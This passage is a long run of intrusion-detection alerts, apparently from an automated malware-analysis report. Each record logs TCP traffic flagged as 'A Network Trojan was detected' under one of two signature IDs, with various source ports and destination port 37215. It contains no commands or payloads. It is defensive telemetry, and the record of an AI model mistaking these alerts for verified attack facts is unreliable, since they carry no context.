            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810841
            SID:2829579
            Source Port:48458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873344
            SID:2835222
            Source Port:48328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344529
            SID:2829579
            Source Port:51532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768067
            SID:2829579
            Source Port:41324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.867927
            SID:2835222
            Source Port:58624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714518
            SID:2835222
            Source Port:40662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952032
            SID:2835222
            Source Port:51450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856324
            SID:2829579
            Source Port:52008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810662
            SID:2835222
            Source Port:39714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333859
            SID:2829579
            Source Port:47376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.646377
            SID:2835222
            Source Port:51042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857369
            SID:2835222
            Source Port:38100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604470
            SID:2835222
            Source Port:53746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.300015
            SID:2829579
            Source Port:43736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857152
            SID:2829579
            Source Port:37064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313166
            SID:2835222
            Source Port:56556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808167
            SID:2835222
            Source Port:55990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469801
            SID:2835222
            Source Port:33144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.782169
            SID:2829579
            Source Port:47300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084521
            SID:2835222
            Source Port:52284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.524380
            SID:2835222
            Source Port:51556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857152
            SID:2829579
            Source Port:50780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936002
            SID:2829579
            Source Port:49910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826045
            SID:2829579
            Source Port:48880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.358754
            SID:2835222
            Source Port:59398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899653
            SID:2829579
            Source Port:34776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052974
            SID:2835222
            Source Port:33502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319186
            SID:2835222
            Source Port:47098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870388
            SID:2835222
            Source Port:56354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809672
            SID:2829579
            Source Port:51730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421435
            SID:2835222
            Source Port:41640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.673033
            SID:2835222
            Source Port:46844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.398072
            SID:2829579
            Source Port:42326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930070
            SID:2835222
            Source Port:40584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900849
            SID:2835222
            Source Port:42760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869848
            SID:2829579
            Source Port:52998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.159083
            SID:2835222
            Source Port:32930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843575
            SID:2829579
            Source Port:57124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639260
            SID:2835222
            Source Port:56512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601790
            SID:2829579
            Source Port:53862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899555
            SID:2829579
            Source Port:56586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423016
            SID:2835222
            Source Port:36292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486863
            SID:2829579
            Source Port:49502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532578
            SID:2829579
            Source Port:49770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770827
            SID:2835222
            Source Port:37124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759802
            SID:2829579
            Source Port:40182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321220
            SID:2835222
            Source Port:47370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851164
            SID:2835222
            Source Port:56566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821656
            SID:2835222
            Source Port:49834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990497
            SID:2835222
            Source Port:59554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676520
            SID:2829579
            Source Port:55600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.004807
            SID:2835222
            Source Port:43540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865414
            SID:2829579
            Source Port:53954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381764
            SID:2835222
            Source Port:37300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180814
            SID:2829579
            Source Port:40904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323248
            SID:2829579
            Source Port:34494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260696
            SID:2835222
            Source Port:44070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300237
            SID:2835222
            Source Port:43242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999482
            SID:2835222
            Source Port:60218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.760240
            SID:2835222
            Source Port:56310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.070586
            SID:2829579
            Source Port:48670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994734
            SID:2835222
            Source Port:36922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.792686
            SID:2835222
            Source Port:55742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827406
            SID:2835222
            Source Port:56842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855913
            SID:2829579
            Source Port:58126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.822120
            SID:2829579
            Source Port:33312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990032
            SID:2829579
            Source Port:52118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061252
            SID:2829579
            Source Port:42942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436973
            SID:2829579
            Source Port:60166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655462
            SID:2829579
            Source Port:60876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046926
            SID:2829579
            Source Port:53744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.517767
            SID:2829579
            Source Port:39078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469939
            SID:2835222
            Source Port:49156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290793
            SID:2829579
            Source Port:43706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834174
            SID:2835222
            Source Port:52304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723611
            SID:2829579
            Source Port:47416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855935
            SID:2829579
            Source Port:35256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951441
            SID:2835222
            Source Port:55368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777003
            SID:2835222
            Source Port:57436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932825
            SID:2829579
            Source Port:60334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.252106
            SID:2829579
            Source Port:50280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995551
            SID:2829579
            Source Port:36214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.061932
            SID:2835222
            Source Port:44666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765281
            SID:2835222
            Source Port:54962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848313
            SID:2835222
            Source Port:44092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459456
            SID:2829579
            Source Port:56980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909167
            SID:2835222
            Source Port:38852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562305
            SID:2829579
            Source Port:45540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508171
            SID:2835222
            Source Port:58354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.252203
            SID:2829579
            Source Port:55898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.346170
            SID:2835222
            Source Port:57942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060979
            SID:2829579
            Source Port:54986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879501
            SID:2829579
            Source Port:34466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665208
            SID:2835222
            Source Port:42416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873349
            SID:2829579
            Source Port:40374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916612
            SID:2829579
            Source Port:58706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.548218
            SID:2835222
            Source Port:52732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943361
            SID:2829579
            Source Port:36506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282877
            SID:2829579
            Source Port:34426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.419273
            SID:2829579
            Source Port:48732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563498
            SID:2829579
            Source Port:50424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052833
            SID:2835222
            Source Port:49844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753357
            SID:2829579
            Source Port:50672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919754
            SID:2835222
            Source Port:55572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321573
            SID:2829579
            Source Port:55712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772080
            SID:2829579
            Source Port:39650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.376871
            SID:2829579
            Source Port:52414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759990
            SID:2835222
            Source Port:34582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.443163
            SID:2829579
            Source Port:50672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757649
            SID:2829579
            Source Port:45500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922123
            SID:2829579
            Source Port:35432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.953054
            SID:2835222
            Source Port:56964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863492
            SID:2835222
            Source Port:59328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.668122
            SID:2835222
            Source Port:35960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.976884
            SID:2835222
            Source Port:37424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929271
            SID:2835222
            Source Port:49566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334965
            SID:2835222
            Source Port:51700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870185
            SID:2835222
            Source Port:45432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682276
            SID:2835222
            Source Port:60460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762058
            SID:2829579
            Source Port:56908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828933
            SID:2835222
            Source Port:43808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704913
            SID:2829579
            Source Port:48916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910183
            SID:2829579
            Source Port:35306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953634
            SID:2835222
            Source Port:33680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.252218
            SID:2829579
            Source Port:46992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857045
            SID:2829579
            Source Port:55064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.342951
            SID:2835222
            Source Port:36242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.722092
            SID:2829579
            Source Port:33802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985008
            SID:2829579
            Source Port:55912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.305521
            SID:2829579
            Source Port:40338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.444149
            SID:2829579
            Source Port:48388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459393
            SID:2835222
            Source Port:36678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697471
            SID:2829579
            Source Port:40914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290406
            SID:2835222
            Source Port:57534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605381
            SID:2835222
            Source Port:45956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026415
            SID:2835222
            Source Port:41914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.332844
            SID:2835222
            Source Port:38456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857527
            SID:2835222
            Source Port:49092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.896769
            SID:2829579
            Source Port:39228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.524504
            SID:2829579
            Source Port:36604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.721451
            SID:2829579
            Source Port:38840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645672
            SID:2829579
            Source Port:37014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.549980
            SID:2829579
            Source Port:49494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862631
            SID:2835222
            Source Port:48690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809963
            SID:2829579
            Source Port:52694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825692
            SID:2829579
            Source Port:59434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.822153
            SID:2835222
            Source Port:47230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.071675
            SID:2835222
            Source Port:37688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260465
            SID:2835222
            Source Port:43476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.682133
            SID:2829579
            Source Port:38836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927515
            SID:2829579
            Source Port:45568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.881884
            SID:2829579
            Source Port:57920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425932
            SID:2829579
            Source Port:59222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962590
            SID:2829579
            Source Port:34772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.000448
            SID:2835222
            Source Port:36214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.490928
            SID:2829579
            Source Port:44188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870116
            SID:2835222
            Source Port:47064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865958
            SID:2829579
            Source Port:44886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893149
            SID:2835222
            Source Port:38414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990011
            SID:2829579
            Source Port:55626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058048
            SID:2835222
            Source Port:52178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.835581
            SID:2829579
            Source Port:53736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743951
            SID:2835222
            Source Port:41652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834361
            SID:2835222
            Source Port:51094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068391
            SID:2829579
            Source Port:56062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871534
            SID:2829579
            Source Port:38174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388658
            SID:2835222
            Source Port:50874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.025179
            SID:2829579
            Source Port:55784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.310217
            SID:2829579
            Source Port:47900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741892
            SID:2829579
            Source Port:42026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.858395
            SID:2829579
            Source Port:60330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.000661
            SID:2829579
            Source Port:44790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929127
            SID:2829579
            Source Port:45424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066817
            SID:2829579
            Source Port:49878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.311666
            SID:2829579
            Source Port:50008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771672
            SID:2835222
            Source Port:60586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.651820
            SID:2829579
            Source Port:40236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.646515
            SID:2835222
            Source Port:45126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952850
            SID:2829579
            Source Port:38940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058750
            SID:2829579
            Source Port:58040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704608
            SID:2835222
            Source Port:38944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046998
            SID:2829579
            Source Port:34980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857836
            SID:2829579
            Source Port:46436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910809
            SID:2835222
            Source Port:50190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273339
            SID:2829579
            Source Port:42640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917289
            SID:2835222
            Source Port:56746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772953
            SID:2829579
            Source Port:35202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.687603
            SID:2835222
            Source Port:58424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954537
            SID:2835222
            Source Port:54196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.067384
            SID:2829579
            Source Port:43288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989811
            SID:2829579
            Source Port:52174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776149
            SID:2835222
            Source Port:54720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730764
            SID:2829579
            Source Port:50460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222058
            SID:2835222
            Source Port:56146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863004
            SID:2829579
            Source Port:48266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804057
            SID:2835222
            Source Port:56982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058234
            SID:2835222
            Source Port:45382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
